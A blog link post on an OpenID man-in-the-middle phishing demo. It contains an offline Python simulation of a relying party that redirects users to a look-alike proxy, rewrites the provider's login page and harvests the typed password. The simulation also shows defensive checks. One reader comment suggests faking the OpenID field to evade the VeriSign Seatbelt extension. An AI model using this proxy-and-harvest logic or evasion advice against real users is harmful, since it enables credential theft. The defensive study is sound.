OpenID phishing demo (via) A demonstration of the OpenID man-in-the-middle phishing attack: a malicious relying party sends you not to your real provider but to a proxy that relays your provider's login page and records the password you type into it. idproxy.net OpenIDs are immune to this particular variant because the idproxy.net landing page never asks for your password, so a proxy relaying it has nothing to capture (the phishing site could still serve its own redesigned landing page with a password field and hope users don't notice, though).
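The attack the demo performs, as an added offline simulation (this is not the demo's code, nor code from idproxy.net or any OpenID library): a relying party chooses where the browser is redirected for checkid_setup, so a malicious one swaps the provider host for a proxy host; the proxy relays the provider's login page with its URLs rewritten so the victim stays on the proxy, and records the password on the way through. The provider, proxy and relying-party hostnames, the two HTML pages and the form fields are all constructed for this example. The last two functions show the two things the post relies on: a password-less landing page gives the proxy nothing to harvest, and the only user-side check that works is the host in the address bar after the redirect.

```python
# Added example, not code from the original post or the linked demo. Hosts,
# pages and field names are constructed; no network traffic is generated.
from html.parser import HTMLParser
from urllib.parse import urlencode, urlsplit, urlunsplit

REAL_OP_HOST = "openid.example.net"           # hypothetical provider
PHISH_HOST = "openid.example.net.evil.test"   # hypothetical attacker-run proxy
RP_HOST = "shop.evil.test"                    # hypothetical malicious relying party

# Constructed: the login page the real provider serves for a checkid_setup request.
REAL_LOGIN_PAGE = (
    '<form method="post" action="https://openid.example.net/login">'
    '<input type="hidden" name="openid.identity" value="https://openid.example.net/alice">'
    '<input type="password" name="password">'
    '<a href="https://openid.example.net/help">Help</a>'
    '</form>'
)

# Constructed: a landing page in the style the post attributes to idproxy.net,
# which confirms the request without ever asking for a password.
PASSWORDLESS_LANDING_PAGE = (
    '<form method="post" action="https://openid.example.net/confirm">'
    '<input type="hidden" name="openid.identity" value="https://openid.example.net/alice">'
    '<input type="submit" value="Continue as alice">'
    '</form>'
)


def build_checkid_redirect(op_endpoint, identity, return_to):
    """OpenID 1.1 checkid_setup URL the RP hands to the browser. The RP, not the
    user, picks op_endpoint, which is what makes the proxy attack possible."""
    query = urlencode({
        "openid.mode": "checkid_setup",
        "openid.identity": identity,
        "openid.return_to": return_to,
        "openid.trust_root": f"https://{urlsplit(return_to).hostname}/",
    })
    p = urlsplit(op_endpoint)
    return urlunsplit((p.scheme, p.netloc, p.path, query, ""))


def swap_host(url, new_host):
    """Malicious RP / proxy: keep the provider's path, change only the host."""
    p = urlsplit(url)
    return urlunsplit((p.scheme, new_host, p.path, p.query, p.fragment))


class ProxyRewriter(HTMLParser):
    """Proxy side: relay the provider's HTML with every absolute URL that points at
    the real provider redirected to the proxy, so forms and links stay on it."""
    def __init__(self, real_host, phish_host):
        super().__init__()
        self.real_host, self.phish_host, self.out = real_host, phish_host, []

    def handle_starttag(self, tag, attrs):
        fixed = []
        for name, value in attrs:
            if name in ("action", "href", "src") and value and urlsplit(value).hostname == self.real_host:
                value = swap_host(value, self.phish_host)
            fixed.append(f' {name}="{value}"' if value is not None else f" {name}")
        self.out.append(f"<{tag}{''.join(fixed)}>")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)


def relay_page(html, real_host=REAL_OP_HOST, phish_host=PHISH_HOST):
    parser = ProxyRewriter(real_host, phish_host)
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


def harvest(posted_fields):
    """Proxy side: copy credential fields out of the relayed POST before forwarding
    it to the real provider (the forwarding itself is omitted here)."""
    return {k: v for k, v in posted_fields.items() if "password" in k.lower()}


def page_asks_for_password(html):
    """Why the password-less landing page is immune to this variant."""
    return 'type="password"' in html


def landing_host_is_trusted(redirect_url, trusted_op_host):
    """User-side check: the address-bar host after the RP's redirect must be the
    provider's exact host, not a look-alike."""
    return urlsplit(redirect_url).hostname == trusted_op_host


if __name__ == "__main__":
    identity = f"https://{REAL_OP_HOST}/alice"
    real_ep, done = f"https://{REAL_OP_HOST}/server", f"https://{RP_HOST}/done"
    honest = build_checkid_redirect(real_ep, identity, done)
    phish = build_checkid_redirect(swap_host(real_ep, PHISH_HOST), identity, done)
    print("honest redirect trusted:", landing_host_is_trusted(honest, REAL_OP_HOST))
    print("phish redirect trusted:", landing_host_is_trusted(phish, REAL_OP_HOST))
    print(relay_page(REAL_LOGIN_PAGE))
    print("captured:", harvest({"openid.identity": identity, "password": "hunter2"}))
    print("password-less page capturable:", page_asks_for_password(relay_page(PASSWORDLESS_LANDING_PAGE)))
```

Running it shows the rewritten form now posts to the proxy host while the hidden identity value is untouched, that the proxy captures the password field from the relayed POST, and that the same relay of the password-less page captures nothing, which is the immunity the post describes.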
I couldn't figure out where to click to submit the form. I put in my OpenID (my domain name) and clicking on the submit button just brought down a list of OpenID places. So I clicked on "Other OpenID", but that just reset the form, making me have to retype my OpenID. I tried it again, just clicking the submit button... again. Still didn't work. So I pressed enter to submit it. Then it apparently submitted, but it just gave me a blank page. I'm currently delegating to claimid.com, so maybe they're immune too?
Very neat attack; the use of a proxy makes for a very convincing phish page.
One improvement to the attack, which would negate a very significant benefit of the VeriSign Seatbelt browser extension, is to not use an actual OpenID input field but to fake one that looks like it. Currently VeriSign detects when you click on an OpenID text field and prompts you to log in, bypassing the phish login.
Thank you for the interesting demo. In addition to Yang's comments, this attack is simply detected by the Sxipper browser extension. I'd like to see an improved demo site soon.